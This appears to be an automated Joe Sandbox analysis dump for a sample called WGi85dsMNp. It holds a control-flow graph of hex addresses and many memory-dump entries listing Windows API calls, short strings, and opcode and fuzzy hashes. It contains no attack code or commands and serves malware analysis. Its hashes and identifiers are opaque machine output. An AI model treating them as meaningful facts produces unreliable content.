                                                                                                      control_flow_graph 1537 165460-16546d 1538 165475-165477 1537->1538 1539 16546f-165473 1537->1539 1540 165688-16568f 1538->1540 1539->1538 1541 16547c-165487 1539->1541 1542 165690 1541->1542 1543 16548d-165494 1541->1543 1546 165695-1656cd 1542->1546 1544 16549a-1654a9 1543->1544 1545 165629-16562f 1543->1545 1544->1546 1547 1654af-1654be 1544->1547 1548 165635-165639 1545->1548 1549 165631-165633 1545->1549 1567 1656d6-1656da 1546->1567 1568 1656cf-1656d4 1546->1568 1555 1654d3-1654d6 1547->1555 1556 1654c0-1654c3 1547->1556 1550 165686 1548->1550 1551 16563b-165641 1548->1551 1549->1540 1550->1540 1551->1542 1553 165643-165646 1551->1553 1553->1542 1557 165648-16565d 1553->1557 1559 1654e2-1654e8 1555->1559 1560 1654d8-1654db 1555->1560 1558 1654c5-1654c8 1556->1558 1556->1559 1576 165681-165684 1557->1576 1577 16565f-165665 1557->1577 1562 1654ce 1558->1562 1563 1655c9-1655cf 1558->1563 1569 165500-16551d 1559->1569 1570 1654ea-1654f0 1559->1570 1564 16552e-165534 1560->1564 1565 1654dd 1560->1565 1573 1655f4-165601 1562->1573 1571 1655e7-1655f1 1563->1571 1572 1655d1-1655d7 1563->1572 1574 165536-16553c 1564->1574 1575 16554c-16555e 1564->1575 1565->1573 1578 1656e0-1656e2 1567->1578 1568->1578 1610 165526-165529 1569->1610 1579 1654f4-1654fe 1570->1579 1580 1654f2 1570->1580 1571->1573 1583 1655db-1655e5 1572->1583 1584 1655d9 1572->1584 1601 165615-165617 1573->1601 1602 165603-165607 1573->1602 1586 165540-16554a 1574->1586 1587 16553e 1574->1587 1595 165560-16556c 1575->1595 1596 16556e-165591 1575->1596 1576->1540 1588 165677-16567a 1577->1588 1589 165667-165675 1577->1589 1581 1656f7-1656fe 1578->1581 1582 1656e4-1656f6 1578->1582 1579->1569 1580->1569 1583->1571 1584->1571 1586->1575 1587->1575 1588->1542 1591 16567c-16567f 1588->1591 1589->1542 1589->1588 1591->1576 1591->1577 1611 1655b9-1655c7 1595->1611 1596->1542 1614 165597-16559a 1596->1614 1605 16561b-16561e 1601->1605 1602->1601 1604 165609-16560d 1602->1604 1604->1542 1606 165613 1604->1606 1605->1542 1607 165620-165623 1605->1607 1606->1605 1607->1544 1607->1545 1610->1573 1611->1573 1614->1542 1615 1655a0-1655b2 1614->1615 1615->1611
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ,aq$,aq
                                                                                                      • API String ID: 0-2990736959
                                                                                                      • Opcode ID: da3ebb8e284ed70e7b4e3f02b9d1e1987ba10f1dcad5f4edfe32e6921525af82
                                                                                                      • Instruction ID: 6ef2724b800504cd0384555161df4c372be9a13a62adb1ddf6fd0f04a6c67496
                                                                                                      • Opcode Fuzzy Hash: da3ebb8e284ed70e7b4e3f02b9d1e1987ba10f1dcad5f4edfe32e6921525af82
                                                                                                      • Instruction Fuzzy Hash: C4817D34A009068FCB18DF69CD889AAB7B3BF88315F658169D416DB365DB31EC51CF60
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: <CL5$<CL5
                                                                                                      • API String ID: 0-2820493851
                                                                                                      • Opcode ID: b20de7078ad2d3747830d9503869cd077d7e216feca247385f6b608aad63670f
                                                                                                      • Instruction ID: 04b1582a5b84fc9b202b41053230e5ccddc442d504dbc45e8182abff8fb0b323
                                                                                                      • Opcode Fuzzy Hash: b20de7078ad2d3747830d9503869cd077d7e216feca247385f6b608aad63670f
                                                                                                      • Instruction Fuzzy Hash: 96314670D023299EEB04CFA5D444BDEBBF2BF86305F40846AD815BB280DB79554ACB51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4']q$4']q
                                                                                                      • API String ID: 0-3120983240
                                                                                                      • Opcode ID: cc242fcd0937e7e060f8822dc71561bb7d76bc92bb73f3f10706ada5e6d9adea
                                                                                                      • Instruction ID: e67a6c7aaeecd4ecaffa88befa96b91d9952121c0a5fb09110c44e6b287c497c
                                                                                                      • Opcode Fuzzy Hash: cc242fcd0937e7e060f8822dc71561bb7d76bc92bb73f3f10706ada5e6d9adea
                                                                                                      • Instruction Fuzzy Hash: 25F0C2353002142FDB081AAA9C5497B7ACBEFCC3A0B048529F90AC73A0DE75CC1183B1
                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 35DF0222
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: e4e1b5b673642d57c54c2408b337d72ee6c8efff14614040ec5c8be27f0fb5c4
                                                                                                      • Instruction ID: aaa30f625128a1796bc5081b784630ecef696bfe9ad0af024486f4c3c2eed930
                                                                                                      • Opcode Fuzzy Hash: e4e1b5b673642d57c54c2408b337d72ee6c8efff14614040ec5c8be27f0fb5c4
                                                                                                      • Instruction Fuzzy Hash: D55101B5C04249EFDF01CF99D884ACEBFB6BF48300F55816AE809AB220D7769845CF90
                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 35DF0222
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: 73d9a2f520ddbb9c46d6baccb082c58694bf7a217fbd0a6b2d24ce78b879a2a4
                                                                                                      • Instruction ID: 8d91d9ab3095e94cc370cf17c53956fb6e70950c443a80a09ea1fd66fc5b944e
                                                                                                      • Opcode Fuzzy Hash: 73d9a2f520ddbb9c46d6baccb082c58694bf7a217fbd0a6b2d24ce78b879a2a4
                                                                                                      • Instruction Fuzzy Hash: A651E0B5D00309DFDB14CF99D884ADEBBB1FF48300F60812AE819AB210D775A885CF91
                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 35DF0222
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: a0e8908db21a7074a67aca06cc1ec5c4532aeddcf7c016a41fef64abcd92b5ba
                                                                                                      • Instruction ID: 27143d7d0c4307563edc7b05c0e7b0ffd7308dfb55ceb0da4841b7028ab08f4e
                                                                                                      • Opcode Fuzzy Hash: a0e8908db21a7074a67aca06cc1ec5c4532aeddcf7c016a41fef64abcd92b5ba
                                                                                                      • Instruction Fuzzy Hash: 3741D1B5D00309DFDB14CF99D884ADEBBB5FF48310F61812AE819AB210D775A985CF91
                                                                                                      APIs
                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 35DF1E81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallProcWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2714655100-0
                                                                                                      • Opcode ID: 9fe8f029c0f78895bf2e0cab594421d388b0751e7742f147a97fb75603070cb4
                                                                                                      • Instruction ID: 4ad4adb98d797b3e3db9e2a0ed9b2ab2f7ddf432dba66b1df23a3899aba3b0fd
                                                                                                      • Opcode Fuzzy Hash: 9fe8f029c0f78895bf2e0cab594421d388b0751e7742f147a97fb75603070cb4
                                                                                                      • Instruction Fuzzy Hash: C24116B8A00349CFDB14CF99C444A9AFBF5FF88310F25C459D519AB321D775A841CBA1
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 35DF0C4F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: b7c4ab24b39b220f01627f9e3ea689bcbe0aa74c3598bb7b450824164ab70481
                                                                                                      • Instruction ID: 062762cb496f479b343b5bcd3fb8d9c57fbc36680f3b923b2a57f9b42e093ef5
                                                                                                      • Opcode Fuzzy Hash: b7c4ab24b39b220f01627f9e3ea689bcbe0aa74c3598bb7b450824164ab70481
                                                                                                      • Instruction Fuzzy Hash: 4521E4B5900208AFDB10CFAAD584ADEBBF4FB48310F54841AE919A7310D379A940CFA1
                                                                                                      APIs
                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 35DF0C4F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DuplicateHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 3793708945-0
                                                                                                      • Opcode ID: 5013aebf5ee1aee9c9faf64e7934b43eb7176c59020565270b5cdd640f120057
                                                                                                      • Instruction ID: b12824f6a4e6af3815de64ef46570d5e59918fa74a15b12d8a2955ac038b33c6
                                                                                                      • Opcode Fuzzy Hash: 5013aebf5ee1aee9c9faf64e7934b43eb7176c59020565270b5cdd640f120057
                                                                                                      • Instruction Fuzzy Hash: B821C4B59002499FDB10CFAAD584ADEBBF4FB48310F14841AE959A3310D379A944CFA5
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Timer
                                                                                                      • String ID:
                                                                                                      • API String ID: 2870079774-0
                                                                                                      • Opcode ID: 35594b388f15fb61ec05790cc37e62a680b14991bf31b321ea37fe4a46668ef7
                                                                                                      • Instruction ID: aebdc360d2ecde8feac9771e2c182dba3d4451d371e2125b16679a60c6862e11
                                                                                                      • Opcode Fuzzy Hash: 35594b388f15fb61ec05790cc37e62a680b14991bf31b321ea37fe4a46668ef7
                                                                                                      • Instruction Fuzzy Hash: 351106B5800349DFDB10DF9AD844BDEBBF8FB49710F10845AD519A7200C379A584CFA1
                                                                                                      APIs
                                                                                                      • OleInitialize.OLE32(00000000), ref: 35DFD445
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2538663250-0
                                                                                                      • Opcode ID: 95dca3d903f74a45941942bb9b49226d11c37ddfc67dbe5e6f9fda770c5a2874
                                                                                                      • Instruction ID: 24fe8d8f276e823a95a4d53e43d4fb50d4b80f3f16b963349c70da34ae07fa88
                                                                                                      • Opcode Fuzzy Hash: 95dca3d903f74a45941942bb9b49226d11c37ddfc67dbe5e6f9fda770c5a2874
                                                                                                      • Instruction Fuzzy Hash: DF1142B5804348CFCB20DFAAC544BDEBBF4EB48320F20841AD619A7300C379A980CFA5
                                                                                                      APIs
                                                                                                      • OleInitialize.OLE32(00000000), ref: 35DFD445
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2538663250-0
                                                                                                      • Opcode ID: bf4f95c5f0b6b31b705cdb0aaaee9066b9aeb3fb79c11ef3ce8d87d538a9cb9c
                                                                                                      • Instruction ID: c26283fea658f0de2fe2609aaf3ee346d67e2600d3bcdb7d95cb8788c9e0e704
                                                                                                      • Opcode Fuzzy Hash: bf4f95c5f0b6b31b705cdb0aaaee9066b9aeb3fb79c11ef3ce8d87d538a9cb9c
                                                                                                      • Instruction Fuzzy Hash: 001112B58002488FCB20DFAAC544BDEBBF4EB49320F20845AD519A7600C379A984CFA5
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944389815.0000000035DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35DF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35df0000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Timer
                                                                                                      • String ID:
                                                                                                      • API String ID: 2870079774-0
                                                                                                      • Opcode ID: 6324f790b1c3b66179d6acc943a60dec2701a7e3d6370c98f587c5da19f19db0
                                                                                                      • Instruction ID: e34be92f347455c66d5c5ec059799e3c58a9b0dd92b7558ae678bb6f4662ab22
                                                                                                      • Opcode Fuzzy Hash: 6324f790b1c3b66179d6acc943a60dec2701a7e3d6370c98f587c5da19f19db0
                                                                                                      • Instruction Fuzzy Hash: F211D3B58003499FDB10DF9AD945BDEBBF8FB48320F10841AD559A7610C379A584CFA1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LR]q
                                                                                                      • API String ID: 0-3081347316
                                                                                                      • Opcode ID: 20b737145b877c29eac487b8fea0e320d2aa1c8c0c47ba8032db699cf30edfba
                                                                                                      • Instruction ID: a62feb214ecf519d119af8f9095b963862588de4bb274235a11e308233e82480
                                                                                                      • Opcode Fuzzy Hash: 20b737145b877c29eac487b8fea0e320d2aa1c8c0c47ba8032db699cf30edfba
                                                                                                      • Instruction Fuzzy Hash: 78A1A474A00249CFCF05EFA8E98599DBBF6FF48305B144629E405AB265DB78AD47CF80
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LR]q
                                                                                                      • API String ID: 0-3081347316
                                                                                                      • Opcode ID: 796cc8ec023a7eedbf6ffe8147c9b4105146d6d3fb29a92aa900cfdc5381b007
                                                                                                      • Instruction ID: 95256dcc5d2d98f96835c1f0390f63b96ffd9d706105cbee58c9d48f598768cf
                                                                                                      • Opcode Fuzzy Hash: 796cc8ec023a7eedbf6ffe8147c9b4105146d6d3fb29a92aa900cfdc5381b007
                                                                                                      • Instruction Fuzzy Hash: 1AA19474A00249CFCF05EFA8E98599DBBF6FF48305B144529E405A7265DB78AD47CF80
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: gL5
                                                                                                      • API String ID: 0-1824004345
                                                                                                      • Opcode ID: bed170c38e62c37e0e689abd71a63e4cedf2fc19bbe75ec7ce4f682a250a011b
                                                                                                      • Instruction ID: 147a3fb0d7fadcd418c77d140d170de549c957b8655b463bec936c185db5d6b2
                                                                                                      • Opcode Fuzzy Hash: bed170c38e62c37e0e689abd71a63e4cedf2fc19bbe75ec7ce4f682a250a011b
                                                                                                      • Instruction Fuzzy Hash: 38710575A102199FDB0ADFB5D9589ADBBF2FF88304F10852AD806AB250DF349942DF41
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (o]q
                                                                                                      • API String ID: 0-794736227
                                                                                                      • Opcode ID: b112dc2d8e3b8ac84c7fcc65aa5699c31c6ac5fbd31f85203a22cf70d6546c24
                                                                                                      • Instruction ID: da35139765854e8cd0b834f11b64bb43513c55df0ff50ca5296d73b3ecda9b89
                                                                                                      • Opcode Fuzzy Hash: b112dc2d8e3b8ac84c7fcc65aa5699c31c6ac5fbd31f85203a22cf70d6546c24
                                                                                                      • Instruction Fuzzy Hash: C64112357042048FCB19AB69DC54AAE7FA6AFCC710F1440AAE906DB7A1CF309D01CB90
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: TkL5
                                                                                                      • API String ID: 0-735487746
                                                                                                      • Opcode ID: 58ea7a425507a5589582a62a652199fbc4216a0962c6daeaedd6523e42aa2c41
                                                                                                      • Instruction ID: c466ba0160ffa8ea7b38f5d587e929c2ddd5df06ce0462f82efca1ea8404ec56
                                                                                                      • Opcode Fuzzy Hash: 58ea7a425507a5589582a62a652199fbc4216a0962c6daeaedd6523e42aa2c41
                                                                                                      • Instruction Fuzzy Hash: 0931E674B047298BDB2CCF66D550AEEBBF2AF88300F40842DC817A7650DB35E846DB60
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: gL5
                                                                                                      • API String ID: 0-1824004345
                                                                                                      • Opcode ID: e756b55f1eb2f303f5b63ee1fe8e83c3d9bfa9a8c86021305a6a68c370c99d0e
                                                                                                      • Instruction ID: ec7523573fbe7808560d2d005a8c203ecb4a1bc67c14aa48f828d2a9b37c9677
                                                                                                      • Opcode Fuzzy Hash: e756b55f1eb2f303f5b63ee1fe8e83c3d9bfa9a8c86021305a6a68c370c99d0e
                                                                                                      • Instruction Fuzzy Hash: 2D313E79A002198FDB1DDF75C5546ED7BF2AF88244F14852AC816EB394DF388842DF51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: TkL5
                                                                                                      • API String ID: 0-735487746
                                                                                                      • Opcode ID: 1245d80f746da9e9a68062c662e98e22dfb9ac2be2b3f29d558c7c58d250eb17
                                                                                                      • Instruction ID: b6dca155c933ea7103ac6858446e99b5be9bdda4db4a6ba734204e774d65baf3
                                                                                                      • Opcode Fuzzy Hash: 1245d80f746da9e9a68062c662e98e22dfb9ac2be2b3f29d558c7c58d250eb17
                                                                                                      • Instruction Fuzzy Hash: 38210674A047298BDB2CCF76C560EEEBBF2AF89300F40842DC853A7250DA319806DB60
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: jL5
                                                                                                      • API String ID: 0-1684048810
                                                                                                      • Opcode ID: 7be53ea66a479f76c745298c70faec818561edd19568cb106d70b2dcdc1ae795
                                                                                                      • Instruction ID: 7f82de5747ad59887daea50890bfad93b9ae27d743b2a8346574b5164115090c
                                                                                                      • Opcode Fuzzy Hash: 7be53ea66a479f76c745298c70faec818561edd19568cb106d70b2dcdc1ae795
                                                                                                      • Instruction Fuzzy Hash: B3F0F435E042289BDB049B68C900FEEBBF6FB85310F00452AD8459B742DB70E549DBD1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ae28cce843d99ce8eb653210e29fbcf1f81a45777ed70e76f9e15923d0314a78
                                                                                                      • Instruction ID: d3ad8cc4aec34c32a43ec6e6afdc780c2edd6db2949195b2c324324be0dfa45f
                                                                                                      • Opcode Fuzzy Hash: ae28cce843d99ce8eb653210e29fbcf1f81a45777ed70e76f9e15923d0314a78
                                                                                                      • Instruction Fuzzy Hash: 07E1C374A00268CFDB25EF60D994BADBBB6FF89300F1084A9980977365CB355E82DF54
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cf2c0e96b961daf44996dcda2b04bb6d0958482ae30c1c012cd0344a911ae404
                                                                                                      • Instruction ID: d2b7bb5d7f431688a10656e046e89b9a9fa52fee93e0a703525411b0cbb44054
                                                                                                      • Opcode Fuzzy Hash: cf2c0e96b961daf44996dcda2b04bb6d0958482ae30c1c012cd0344a911ae404
                                                                                                      • Instruction Fuzzy Hash: 10E1C374A00258CFDB25EF60D994BADB7B6FF89300F1084A9980977365CB355E82DF54
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e21875b8566d56cdb952f4bb18a0787c741a8c22877086a19d88338987932161
                                                                                                      • Instruction ID: d919fb2eedd72dd4f10da548a66b0251ae8c030eeefa037657452d1055b10ecb
                                                                                                      • Opcode Fuzzy Hash: e21875b8566d56cdb952f4bb18a0787c741a8c22877086a19d88338987932161
                                                                                                      • Instruction Fuzzy Hash: 06712834700605CFCB14DF68CC94A6E7BE6AF89741B1944A9E806DB3B1DB76EC61CB90
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d6097ef38a7ee7b6ee499777c1167f7fc892dc6c0ae1b8e0a8e621a4a7346370
                                                                                                      • Instruction ID: fbc50a72022469b728689421b86c92c03abcfdf3b472ddd3cfe9d9a6fbbb3a49
                                                                                                      • Opcode Fuzzy Hash: d6097ef38a7ee7b6ee499777c1167f7fc892dc6c0ae1b8e0a8e621a4a7346370
                                                                                                      • Instruction Fuzzy Hash: 93718C316086559FCB15CF28CCD8A6ABFB5FF46311B068499F829DB262C731EC91CB91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3ab6cb11faadf7b5fff70e0a5ab1beb83cfbd84026e2fc009df3a8d10be421d9
                                                                                                      • Instruction ID: d40225b08742ad310e300eb92573cfd7aa77ad740d0b39cd83a04d187dad8d52
                                                                                                      • Opcode Fuzzy Hash: 3ab6cb11faadf7b5fff70e0a5ab1beb83cfbd84026e2fc009df3a8d10be421d9
                                                                                                      • Instruction Fuzzy Hash: 9A611A74A00258CFDB15EF65D954BADBBBAFF88300F1088AA990A77365CB355D82DF04
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3944257966.0000000035A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 35A90000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_35a90000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2f646c20d8dbe857c0c9fa5a54fcb867d7ab0e681a373956b24fc10e17ac9b15
                                                                                                      • Instruction ID: d408c8c8c3bcbc0e033aa49d11c886ed05e6733a1a117d086fdaf9b5d1eca009
                                                                                                      • Opcode Fuzzy Hash: 2f646c20d8dbe857c0c9fa5a54fcb867d7ab0e681a373956b24fc10e17ac9b15
                                                                                                      • Instruction Fuzzy Hash: 4B519274E01218DFDB58DFA9C990ADDBBB2FF89300F208169D809AB365DB316946CF40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.3920420620.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_160000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5757b14bc80900f4492957c82113e2675d4c23dbe21f1cb7530166440ca45a9a
                                                                                                      • Instruction ID: 41edba70832bf97cf462ac007a47d0ace092eb9d666d42188600bfd4a554e8bd
                                                                                                      • Opcode Fuzzy Hash: 5757b14bc80900f4492957c82113e2675d4c23dbe21f1cb7530166440ca45a9a
